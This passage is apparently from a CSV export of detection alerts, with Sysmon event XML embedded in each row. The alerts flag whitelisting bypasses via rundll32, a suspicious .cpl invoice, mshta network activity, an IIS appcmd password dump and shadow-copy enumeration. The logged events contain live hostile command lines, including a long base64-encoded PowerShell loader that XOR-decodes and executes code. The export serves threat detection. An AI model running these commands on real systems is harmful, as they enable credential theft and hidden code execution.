<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\SysWOW64\rundll32.exe&quot; &quot;C:\Windows\SysWOW64\shell32.dll&quot;,#44 &quot;C:\Users\IEUser\Downloads\Invoice@0582.cpl&quot;,</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\Downloads\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-0020B5314100</Data>
<Data Name=""LogonId"">0x4131b5</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B</Data>
<Data Name=""ParentProcessGuid"">747F3D96-60F5-5D3F-0000-0010D1CF5500</Data>
<Data Name=""ParentProcessId"">4356</Data>
<Data Name=""ParentImage"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\rundll32.exe&quot; Shell32.dll,Control_RunDLL &quot;C:\Users\IEUser\Downloads\Invoice@0582.cpl&quot;,</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
Prohibited Process connecting to internet,1558452781.141798,2019-05-21T19:33:01.141798+04:00,,Threat,Critical,"User (IEWIN7\IEUser) run process C:\Windows\System32\mshta.exe and initiated network connection from hostname ( IEWIN7..home and IP ( 10.0.2.15 ) to hostname ( aka112.inwitelecom.net ) , IP ( 105.73.6.112 ) and port ( 80 )",3,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>3</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>3</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-21T15:33:00.140358Z"">
</TimeCreated>
<EventRecordID>4131</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3416"" ThreadID=""3628"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-21 06:58:40.518</Data>
<Data Name=""ProcessGuid"">365ABB72-1A29-5CE4-0000-001079F92101</Data>
<Data Name=""ProcessId"">2432</Data>
<Data Name=""Image"">C:\Windows\System32\mshta.exe</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""Protocol"">tcp</Data>
<Data Name=""Initiated"">true</Data>
<Data Name=""SourceIsIpv6"">false</Data>
<Data Name=""SourceIp"">10.0.2.15</Data>
<Data Name=""SourceHostname"">IEWIN7..home</Data>
<Data Name=""SourcePort"">49704</Data>
<Data Name=""SourcePortName""></Data>
<Data Name=""DestinationIsIpv6"">false</Data>
<Data Name=""DestinationIp"">105.73.6.112</Data>
<Data Name=""DestinationHostname"">aka112.inwitelecom.net</Data>
<Data Name=""DestinationPort"">80</Data>
<Data Name=""DestinationPortName"">http</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1584766825.192553,2020-03-21T09:00:25.192553+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:25.189133Z"">
</TimeCreated>
<EventRecordID>243532</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:24.985</Data>
<Data Name=""ProcessGuid"">747F3D96-9F68-5E75-0000-001079652000</Data>
<Data Name=""ProcessId"">3300</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766825.192553,2020-03-21T09:00:25.192553+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:25.189133Z"">
</TimeCreated>
<EventRecordID>243532</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:24.985</Data>
<Data Name=""ProcessGuid"">747F3D96-9F68-5E75-0000-001079652000</Data>
<Data Name=""ProcessId"">3300</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1584766825.192553,2020-03-21T09:00:25.192553+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:25.189133Z"">
</TimeCreated>
<EventRecordID>243532</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:24.985</Data>
<Data Name=""ProcessGuid"">747F3D96-9F68-5E75-0000-001079652000</Data>
<Data Name=""ProcessId"">3300</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1557668039.743077,2019-05-12T17:33:59.743077+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32.exe url.dll,FileProtocolHandler calc.exe)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-12T13:33:37.078801Z"">
</TimeCreated>
<EventRecordID>16391</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2032"" ThreadID=""1996"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-12 13:33:37.063</Data>
<Data Name=""ProcessGuid"">365ABB72-20B1-5CD8-0000-001064D62400</Data>
<Data Name=""ProcessId"">1844</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">rundll32.exe url.dll,FileProtocolHandler calc.exe</Data>
<Data Name=""CurrentDirectory"">c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-1596-5CD8-0000-0020103A0100</Data>
<Data Name=""LogonId"">0x13a10</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
<Data Name=""ParentProcessGuid"">365ABB72-2006-5CD8-0000-0010E0912300</Data>
<Data Name=""ParentProcessId"">2936</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1557668039.743077,2019-05-12T17:33:59.743077+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe url.dll,FileProtocolHandler calc.exe )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-12T13:33:37.078801Z"">
</TimeCreated>
<EventRecordID>16391</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2032"" ThreadID=""1996"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-12 13:33:37.063</Data>
<Data Name=""ProcessGuid"">365ABB72-20B1-5CD8-0000-001064D62400</Data>
<Data Name=""ProcessId"">1844</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">rundll32.exe url.dll,FileProtocolHandler calc.exe</Data>
<Data Name=""CurrentDirectory"">c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-1596-5CD8-0000-0020103A0100</Data>
<Data Name=""LogonId"">0x13a10</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
<Data Name=""ParentProcessGuid"">365ABB72-2006-5CD8-0000-0010E0912300</Data>
<Data Name=""ParentProcessId"">2936</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1557668039.743077,2019-05-12T17:33:59.743077+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe url.dll,FileProtocolHandler calc.exe )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-12T13:33:37.078801Z"">
</TimeCreated>
<EventRecordID>16391</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2032"" ThreadID=""1996"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-12 13:33:37.063</Data>
<Data Name=""ProcessGuid"">365ABB72-20B1-5CD8-0000-001064D62400</Data>
<Data Name=""ProcessId"">1844</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">rundll32.exe url.dll,FileProtocolHandler calc.exe</Data>
<Data Name=""CurrentDirectory"">c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-1596-5CD8-0000-0020103A0100</Data>
<Data Name=""LogonId"">0x13a10</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
<Data Name=""ParentProcessGuid"">365ABB72-2006-5CD8-0000-0010E0912300</Data>
<Data Name=""ParentProcessId"">2936</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920558.973148,2019-05-27T05:29:18.973148+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list vdir &quot;ERROR ( message:Configuration error &quot; /text:password ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T01:29:18.973148Z"">
</TimeCreated>
<EventRecordID>5943</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""324"" ThreadID=""2260"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 01:29:18.933</Data>
<Data Name=""ProcessGuid"">365ABB72-3D6E-5CEB-0000-0010EFADFF00</Data>
<Data Name=""ProcessId"">2276</Data>
<Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
<Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Application Server Command Line Admin Tool</Data>
<Data Name=""Product"">Internet Information Services</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list vdir &quot;ERROR ( message:Configuration error &quot; /text:password</Data>
<Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
<Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
<Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
<Data Name=""LogonId"">0x82423</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
<Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
<Data Name=""ParentProcessId"">2584</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558969968.76308,2019-05-27T19:12:48.763080+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c vssadmin List Shadows| find &quot;Shadow Copy Volume&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T15:12:48.655114Z"">
</TimeCreated>
<EventRecordID>6184</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""980"" ThreadID=""2220"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 15:12:48.644</Data>
<Data Name=""ProcessGuid"">365ABB72-FE70-5CEB-0000-0010385C0C00</Data>
<Data Name=""ProcessId"">2412</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd.exe /c vssadmin List Shadows| find &quot;Shadow Copy Volume&quot; </Data>
